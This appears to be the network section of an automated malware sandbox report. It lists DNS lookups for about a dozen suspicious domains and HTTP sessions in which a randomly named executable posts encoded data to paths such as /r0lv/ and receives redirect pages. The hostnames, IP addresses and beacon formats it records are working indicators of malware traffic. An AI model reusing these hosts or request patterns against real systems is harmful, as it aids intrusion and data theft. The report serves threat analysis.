                                                                      Nov 6, 2024 05:23:43.029059887 CET53530991.1.1.1192.168.2.6
                                                                      Nov 6, 2024 05:23:57.200754881 CET5996053192.168.2.61.1.1.1
                                                                      Nov 6, 2024 05:23:57.385509968 CET53599601.1.1.1192.168.2.6
                                                                      Nov 6, 2024 05:24:10.732769012 CET5156953192.168.2.61.1.1.1
                                                                      Nov 6, 2024 05:24:10.756022930 CET53515691.1.1.1192.168.2.6
                                                                      Nov 6, 2024 05:24:24.059643030 CET6247253192.168.2.61.1.1.1
                                                                      Nov 6, 2024 05:24:24.100389957 CET53624721.1.1.1192.168.2.6
                                                                      Nov 6, 2024 05:24:37.402545929 CET5052353192.168.2.61.1.1.1
                                                                      Nov 6, 2024 05:24:37.856326103 CET53505231.1.1.1192.168.2.6
                                                                      Nov 6, 2024 05:24:51.342848063 CET6225253192.168.2.61.1.1.1
                                                                      Nov 6, 2024 05:24:51.398292065 CET53622521.1.1.1192.168.2.6
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Nov 6, 2024 05:21:47.894628048 CET192.168.2.61.1.1.10x66e5Standard query (0)www.spencermarcu.movieA (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:22:04.699282885 CET192.168.2.61.1.1.10x7012Standard query (0)www.cybermisha.storeA (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:22:12.777313948 CET192.168.2.61.1.1.10x5a22Standard query (0)www.trifecta.centerA (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:22:26.152328014 CET192.168.2.61.1.1.10x3d27Standard query (0)www.college-help.infoA (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:22:40.168040037 CET192.168.2.61.1.1.10x449bStandard query (0)www.whiteshieldinsure.orgA (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:22:54.511655092 CET192.168.2.61.1.1.10x3a41Standard query (0)www.1daysober.comA (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:23:07.825095892 CET192.168.2.61.1.1.10xcb16Standard query (0)www.plyvik.infoA (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:23:21.230719090 CET192.168.2.61.1.1.10xb0faStandard query (0)www.gucciqueen.shopA (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:23:34.840718985 CET192.168.2.61.1.1.10x3febStandard query (0)www.cybermisha.storeA (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:23:42.917772055 CET192.168.2.61.1.1.10x8e24Standard query (0)www.jivatop.onlineA (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:23:57.200754881 CET192.168.2.61.1.1.10x4786Standard query (0)www.seraph.bestA (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:24:10.732769012 CET192.168.2.61.1.1.10xb808Standard query (0)www.scottlasher.orgA (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:24:24.059643030 CET192.168.2.61.1.1.10xc1d4Standard query (0)www.6686vi38.appA (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:24:37.402545929 CET192.168.2.61.1.1.10xc844Standard query (0)www.papampalli.shopA (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:24:51.342848063 CET192.168.2.61.1.1.10x73e2Standard query (0)www.yourwebbuzz.netA (IP address)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Nov 6, 2024 05:21:47.914592981 CET1.1.1.1192.168.2.60x66e5No error (0)www.spencermarcu.moviespencermarcu.movieCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 6, 2024 05:21:47.914592981 CET1.1.1.1192.168.2.60x66e5No error (0)spencermarcu.movie3.33.130.190A (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:21:47.914592981 CET1.1.1.1192.168.2.60x66e5No error (0)spencermarcu.movie15.197.148.33A (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:22:04.721555948 CET1.1.1.1192.168.2.60x7012Name error (3)www.cybermisha.storenonenoneA (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:22:12.788316965 CET1.1.1.1192.168.2.60x5a22No error (0)www.trifecta.centertrifecta.centerCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 6, 2024 05:22:12.788316965 CET1.1.1.1192.168.2.60x5a22No error (0)trifecta.center3.33.130.190A (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:22:12.788316965 CET1.1.1.1192.168.2.60x5a22No error (0)trifecta.center15.197.148.33A (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:22:26.765037060 CET1.1.1.1192.168.2.60x3d27No error (0)www.college-help.info38.88.82.56A (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:22:40.185020924 CET1.1.1.1192.168.2.60x449bNo error (0)www.whiteshieldinsure.orgwhiteshieldinsure.orgCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 6, 2024 05:22:40.185020924 CET1.1.1.1192.168.2.60x449bNo error (0)whiteshieldinsure.org3.33.130.190A (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:22:40.185020924 CET1.1.1.1192.168.2.60x449bNo error (0)whiteshieldinsure.org15.197.148.33A (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:22:54.544785976 CET1.1.1.1192.168.2.60x3a41No error (0)www.1daysober.com1daysober.comCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 6, 2024 05:22:54.544785976 CET1.1.1.1192.168.2.60x3a41No error (0)1daysober.com3.33.130.190A (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:22:54.544785976 CET1.1.1.1192.168.2.60x3a41No error (0)1daysober.com15.197.148.33A (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:23:07.835295916 CET1.1.1.1192.168.2.60xcb16No error (0)www.plyvik.info67.223.117.142A (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:23:21.256381035 CET1.1.1.1192.168.2.60xb0faNo error (0)www.gucciqueen.shopgucciqueen.shopCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 6, 2024 05:23:21.256381035 CET1.1.1.1192.168.2.60xb0faNo error (0)gucciqueen.shop178.79.184.196A (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:23:34.862298012 CET1.1.1.1192.168.2.60x3febName error (3)www.cybermisha.storenonenoneA (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:23:43.029059887 CET1.1.1.1192.168.2.60x8e24No error (0)www.jivatop.online185.179.189.193A (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:23:57.385509968 CET1.1.1.1192.168.2.60x4786No error (0)www.seraph.best52.20.84.62A (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:24:10.756022930 CET1.1.1.1192.168.2.60xb808No error (0)www.scottlasher.orgscottlasher.orgCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 6, 2024 05:24:10.756022930 CET1.1.1.1192.168.2.60xb808No error (0)scottlasher.org3.33.130.190A (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:24:10.756022930 CET1.1.1.1192.168.2.60xb808No error (0)scottlasher.org15.197.148.33A (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:24:24.100389957 CET1.1.1.1192.168.2.60xc1d4No error (0)www.6686vi38.app6686vi38.appCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 6, 2024 05:24:24.100389957 CET1.1.1.1192.168.2.60xc1d4No error (0)6686vi38.app3.33.130.190A (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:24:24.100389957 CET1.1.1.1192.168.2.60xc1d4No error (0)6686vi38.app15.197.148.33A (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:24:37.856326103 CET1.1.1.1192.168.2.60xc844No error (0)www.papampalli.shoppapampalli.shopCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 6, 2024 05:24:37.856326103 CET1.1.1.1192.168.2.60xc844No error (0)papampalli.shop162.241.85.94A (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:24:51.398292065 CET1.1.1.1192.168.2.60x73e2No error (0)www.yourwebbuzz.netyourwebbuzz.netCNAME (Canonical name)IN (0x0001)false
                                                                      Nov 6, 2024 05:24:51.398292065 CET1.1.1.1192.168.2.60x73e2No error (0)yourwebbuzz.net3.33.130.190A (IP address)IN (0x0001)false
                                                                      Nov 6, 2024 05:24:51.398292065 CET1.1.1.1192.168.2.60x73e2No error (0)yourwebbuzz.net15.197.148.33A (IP address)IN (0x0001)false
                                                                      • www.spencermarcu.movie
                                                                      • www.trifecta.center
                                                                      • www.college-help.info
                                                                      • www.whiteshieldinsure.org
                                                                      • www.1daysober.com
                                                                      • www.plyvik.info
                                                                      • www.gucciqueen.shop
                                                                      • www.jivatop.online
                                                                      • www.seraph.best
                                                                      • www.scottlasher.org
                                                                      • www.6686vi38.app
                                                                      • www.papampalli.shop
                                                                      • www.yourwebbuzz.net
                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.6499443.33.130.190804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:21:47.936393976 CET492OUTGET /sgqz/?IrPLc=Knb4R&08rl=z40UQA4uEilCXXdlmYjF9n5vKa/i580zo4gniHRlmWBqOO2Mc3/KIA1Ve2y+wPMV5ve5FEwYeJdlmAqR+Re6XDDxkmNjF6zWKZUvC2ZhY9W/S87H8cuWRnBzaMg+4CPVpmh1XXg= HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Host: www.spencermarcu.movie
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Nov 6, 2024 05:21:49.613399029 CET408INHTTP/1.1 200 OK
                                                                      Server: openresty
                                                                      Date: Wed, 06 Nov 2024 04:21:49 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 268
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 49 72 50 4c 63 3d 4b 6e 62 34 52 26 30 38 72 6c 3d 7a 34 30 55 51 41 34 75 45 69 6c 43 58 58 64 6c 6d 59 6a 46 39 6e 35 76 4b 61 2f 69 35 38 30 7a 6f 34 67 6e 69 48 52 6c 6d 57 42 71 4f 4f 32 4d 63 33 2f 4b 49 41 31 56 65 32 79 2b 77 50 4d 56 35 76 65 35 46 45 77 59 65 4a 64 6c 6d 41 71 52 2b 52 65 36 58 44 44 78 6b 6d 4e 6a 46 36 7a 57 4b 5a 55 76 43 32 5a 68 59 39 57 2f 53 38 37 48 38 63 75 57 52 6e 42 7a 61 4d 67 2b 34 43 50 56 70 6d 68 31 58 58 67 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?IrPLc=Knb4R&08rl=z40UQA4uEilCXXdlmYjF9n5vKa/i580zo4gniHRlmWBqOO2Mc3/KIA1Ve2y+wPMV5ve5FEwYeJdlmAqR+Re6XDDxkmNjF6zWKZUvC2ZhY9W/S87H8cuWRnBzaMg+4CPVpmh1XXg="}</script></head></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.6499853.33.130.190804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:22:12.806332111 CET756OUTPOST /r0lv/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.trifecta.center
                                                                      Origin: http://www.trifecta.center
                                                                      Connection: close
                                                                      Content-Length: 209
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.trifecta.center/r0lv/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 63 53 6a 5a 74 46 64 43 46 6b 6b 4b 58 30 75 48 47 61 34 5a 79 55 70 2b 38 5a 33 2f 49 49 6a 54 70 2f 68 59 35 51 49 74 55 4f 39 62 68 42 41 6c 62 7a 67 74 69 45 64 70 68 6a 4e 59 45 58 33 59 70 4e 64 2b 39 6a 44 56 47 45 72 53 5a 30 32 70 53 6f 70 2b 4c 66 4c 6b 35 6e 63 7a 44 4b 34 4a 53 47 30 68 72 34 38 75 63 36 4f 70 4f 69 6a 70 4a 6b 2b 62 49 4f 63 72 55 66 78 35 47 71 63 79 5a 70 41 70 6f 64 71 79 67 5a 76 69 76 47 77 37 63 6f 7a 43 6c 4b 35 56 59 66 62 7a 34 4b 30 32 68 78 52 39 6d 6c 7a 4e 42 44 32 49 66 62 31 75 32 45 46 56 79 44 4c 70 4c 34 55 4d 4d 61 34 67 63 78 61 51 57 6d 58 33 6d 63 4c 63
                                                                      Data Ascii: 08rl=cSjZtFdCFkkKX0uHGa4ZyUp+8Z3/IIjTp/hY5QItUO9bhBAlbzgtiEdphjNYEX3YpNd+9jDVGErSZ02pSop+LfLk5nczDK4JSG0hr48uc6OpOijpJk+bIOcrUfx5GqcyZpApodqygZvivGw7cozClK5VYfbz4K02hxR9mlzNBD2Ifb1u2EFVyDLpL4UMMa4gcxaQWmX3mcLc


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.6499873.33.130.190804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:22:15.355885029 CET780OUTPOST /r0lv/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.trifecta.center
                                                                      Origin: http://www.trifecta.center
                                                                      Connection: close
                                                                      Content-Length: 233
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.trifecta.center/r0lv/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 63 53 6a 5a 74 46 64 43 46 6b 6b 4b 58 55 65 48 45 35 51 5a 31 30 70 78 79 35 33 2f 66 59 6a 66 70 2f 6c 59 35 55 78 6d 55 63 5a 62 67 6b 73 6c 61 33 4d 74 68 45 64 70 71 44 4e 64 61 6e 33 48 70 4e 51 42 39 69 2f 56 47 45 76 53 5a 31 47 70 53 37 42 39 4c 50 4c 6d 2f 6e 63 78 4a 71 34 4a 53 47 30 68 72 34 6f 45 63 36 47 70 4e 53 7a 70 4a 47 57 55 58 2b 63 30 46 66 78 35 43 71 63 2b 5a 70 41 48 6f 63 6d 55 67 66 7a 69 76 48 41 37 63 36 62 42 72 4b 35 54 47 76 61 57 78 49 52 4b 74 41 35 39 35 55 48 42 59 7a 4f 38 65 74 6f 30 71 33 46 32 67 54 72 72 4c 36 4d 2b 4d 36 34 4b 65 78 69 51 45 78 62 51 70 6f 75 2f 2f 67 56 5a 38 55 52 73 6e 62 65 49 74 6a 6c 75 2b 4a 63 57 66 77 3d 3d
                                                                      Data Ascii: 08rl=cSjZtFdCFkkKXUeHE5QZ10pxy53/fYjfp/lY5UxmUcZbgksla3MthEdpqDNdan3HpNQB9i/VGEvSZ1GpS7B9LPLm/ncxJq4JSG0hr4oEc6GpNSzpJGWUX+c0Ffx5Cqc+ZpAHocmUgfzivHA7c6bBrK5TGvaWxIRKtA595UHBYzO8eto0q3F2gTrrL6M+M64KexiQExbQpou//gVZ8URsnbeItjlu+JcWfw==


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.6499883.33.130.190804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:22:17.900614977 CET1793OUTPOST /r0lv/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.trifecta.center
                                                                      Origin: http://www.trifecta.center
                                                                      Connection: close
                                                                      Content-Length: 1245
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.trifecta.center/r0lv/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 63 53 6a 5a 74 46 64 43 46 6b 6b 4b 58 55 65 48 45 35 51 5a 31 30 70 78 79 35 33 2f 66 59 6a 66 70 2f 6c 59 35 55 78 6d 55 63 52 62 67 53 34 6c 62 57 4d 74 67 45 64 70 6e 6a 4e 63 61 6e 32 64 70 4e 34 46 39 69 7a 6a 47 43 7a 53 59 58 2b 70 44 2b 31 39 41 50 4c 6d 7a 48 63 30 44 4b 35 52 53 47 45 6c 72 34 34 45 63 36 47 70 4e 55 50 70 41 30 2b 55 45 75 63 72 55 66 78 39 47 71 63 61 5a 70 5a 36 6f 63 79 69 6e 70 44 69 76 6e 51 37 51 70 7a 42 6e 4b 35 52 48 76 61 30 78 49 74 76 74 41 30 4f 35 55 79 73 59 30 2b 38 53 4b 5a 41 7a 79 6c 61 69 51 54 63 59 49 46 66 4b 38 51 54 55 79 61 62 46 41 57 34 68 70 76 51 7a 77 67 4f 32 43 59 4e 6d 59 47 32 6a 45 68 37 33 36 42 73 64 67 6c 6d 65 2f 52 7a 69 2b 68 7a 66 52 55 78 4e 69 50 43 67 4f 36 62 4b 70 64 32 47 46 63 43 69 34 69 74 6d 5a 6c 65 57 33 49 55 41 47 78 64 59 78 32 54 77 58 37 67 4e 41 67 59 2b 56 6e 61 4a 36 44 6a 37 72 31 2f 74 37 33 34 76 41 6b 70 37 4f 35 2b 42 6c 76 65 2b 6c 43 62 36 34 45 50 49 51 72 50 52 30 6c 30 44 46 63 56 71 [TRUNCATED]
                                                                      Data Ascii: 08rl=cSjZtFdCFkkKXUeHE5QZ10pxy53/fYjfp/lY5UxmUcRbgS4lbWMtgEdpnjNcan2dpN4F9izjGCzSYX+pD+19APLmzHc0DK5RSGElr44Ec6GpNUPpA0+UEucrUfx9GqcaZpZ6ocyinpDivnQ7QpzBnK5RHva0xItvtA0O5UysY0+8SKZAzylaiQTcYIFfK8QTUyabFAW4hpvQzwgO2CYNmYG2jEh736Bsdglme/Rzi+hzfRUxNiPCgO6bKpd2GFcCi4itmZleW3IUAGxdYx2TwX7gNAgY+VnaJ6Dj7r1/t734vAkp7O5+Blve+lCb64EPIQrPR0l0DFcVq+YvlDuphwlPJI5+fjxZPA/4nhck0xSFTzk8ZjDt0nvmCr0EPsKs8rtPUiRC+Mabmanxz6cF+IlaWKyc9pEhWjiRPvQT3kDhjfyiKbZPx/y4e6E9q43rmwIB/qYq03WhULsHmcJUQHN0vfjZmxtRz7ONEPmLxok7MQmwFEKTnqMez4E24ebd2d5Nsz6MlvHq0Squ5rT7C9kOwvbm5KaZpG/dOWH7VDqx+Yv5h5tiGhnjSsf4fOemA+FBuUKIcsrzlNLTAFSr9g1mIwni3qt9Y6Ejqleu44NEzYyaxZeLuNoJIeIJ7XrdXMby6ghV7Yg2bqPq5XSrwn9zV8MrIMqzAYIV2hTGUL3kUXzuSXMVU7ZbCDlcjcpdAYhnNEOQE/I9XGGdoqeB7X0+nfaVyUlD2wWtkA7SNH9qNLA696KWSLR4qqtYHGkUVRzOXLpZ+cOpk6ebzK5qlkhWovvvcgFQf3i8crDuP1yZZFCfck2fpvqq0Ega0r1+GdMF4CCO/YBaBW88/wMU9olimmeGaIhxzNaaJrx/jcVoxShuUBIYUxuqNhYq8w6BCQbzCFEHUfGORX2AlMLbv9EEiEAPcRkuC8y2eyhAya6gpB+jDxc6d7aA/C2C6GS8w22gqDSKvsTlWqAJvPpuqoLHVfeV8FdBKUNtsTS8lB8R/dr [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.6499893.33.130.190804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:22:20.444834948 CET489OUTGET /r0lv/?IrPLc=Knb4R&08rl=RQL5uypvFlMwQi2GLIId0mZrz/SGN6i+q5FrzH0xA9hYrhUAdlgXlQAJmAAoJGPgrNgV6jvxdXCBcEDPMJZTV+2H43d2bqABGV4siYI9WteDJE2TAna2JNgpF+cMEoE2aLQ71LA= HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Host: www.trifecta.center
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Nov 6, 2024 05:22:21.107662916 CET408INHTTP/1.1 200 OK
                                                                      Server: openresty
                                                                      Date: Wed, 06 Nov 2024 04:22:21 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 268
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 49 72 50 4c 63 3d 4b 6e 62 34 52 26 30 38 72 6c 3d 52 51 4c 35 75 79 70 76 46 6c 4d 77 51 69 32 47 4c 49 49 64 30 6d 5a 72 7a 2f 53 47 4e 36 69 2b 71 35 46 72 7a 48 30 78 41 39 68 59 72 68 55 41 64 6c 67 58 6c 51 41 4a 6d 41 41 6f 4a 47 50 67 72 4e 67 56 36 6a 76 78 64 58 43 42 63 45 44 50 4d 4a 5a 54 56 2b 32 48 34 33 64 32 62 71 41 42 47 56 34 73 69 59 49 39 57 74 65 44 4a 45 32 54 41 6e 61 32 4a 4e 67 70 46 2b 63 4d 45 6f 45 32 61 4c 51 37 31 4c 41 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?IrPLc=Knb4R&08rl=RQL5uypvFlMwQi2GLIId0mZrz/SGN6i+q5FrzH0xA9hYrhUAdlgXlQAJmAAoJGPgrNgV6jvxdXCBcEDPMJZTV+2H43d2bqABGV4siYI9WteDJE2TAna2JNgpF+cMEoE2aLQ71LA="}</script></head></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.64999038.88.82.56804040C:\Program Files (x86)\esXLnBUrkxrIxxPinYLezTcfZFPTXcYbhyMfuSLnWLDHQjZXQsvWaCOMj\HJizhlDIjKVk.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Nov 6, 2024 05:22:26.782284975 CET762OUTPOST /wm94/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                      Accept-Language: en-US
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Host: www.college-help.info
                                                                      Origin: http://www.college-help.info
                                                                      Connection: close
                                                                      Content-Length: 209
                                                                      Cache-Control: max-age=0
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.college-help.info/wm94/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.9200
                                                                      Data Raw: 30 38 72 6c 3d 32 6d 36 61 6a 69 45 6e 66 6e 7a 45 75 36 2f 32 4b 33 37 4a 45 67 79 6d 37 2f 46 2b 38 35 37 6b 76 52 47 6c 4b 73 58 38 33 31 47 67 54 74 62 34 68 45 6b 54 49 68 47 6c 77 65 45 75 77 58 4e 5a 47 70 30 75 48 63 72 70 4d 6b 47 37 50 6a 54 79 39 73 66 58 58 36 69 57 62 46 45 43 54 49 79 6c 6c 67 56 4c 53 6c 54 36 50 73 57 5a 57 57 35 52 2b 76 53 30 39 6f 54 44 45 67 42 4e 55 32 6d 39 4c 4a 2f 35 37 48 44 68 65 5a 43 73 50 6c 32 6f 6a 55 42 54 72 66 65 61 47 46 48 59 30 6c 70 4c 46 54 67 67 77 49 4e 46 34 68 73 68 32 6a 35 4c 34 50 75 39 4a 44 36 57 6c 43 56 4c 4b 66 44 50 38 56 4a 38 31 69 6f 76 53 4c 42 66
                                                                      Data Ascii: 08rl=2m6ajiEnfnzEu6/2K37JEgym7/F+857kvRGlKsX831GgTtb4hEkTIhGlweEuwXNZGp0uHcrpMkG7PjTy9sfXX6iWbFECTIyllgVLSlT6PsWZWW5R+vS09oTDEgBNU2m9LJ/57HDheZCsPl2ojUBTrfeaGFHY0lpLFTggwINF4hsh2j5L4Pu9JD6WlCVLKfDP8VJ81iovSLBf
                                                                      Nov 6, 2024 05:22:27.479523897 CET1236INHTTP/1.1 404 Not Found
                                                                      Date: Wed, 06 Nov 2024 04:22:27 GMT
                                                                      Server: Apache
                                                                      Last-Modified: Mon, 04 Nov 2024 18:50:02 GMT
                                                                      ETag: "49d-6261ac0a04ab1"
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 1181
                                                                      Content-Type: text/html
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
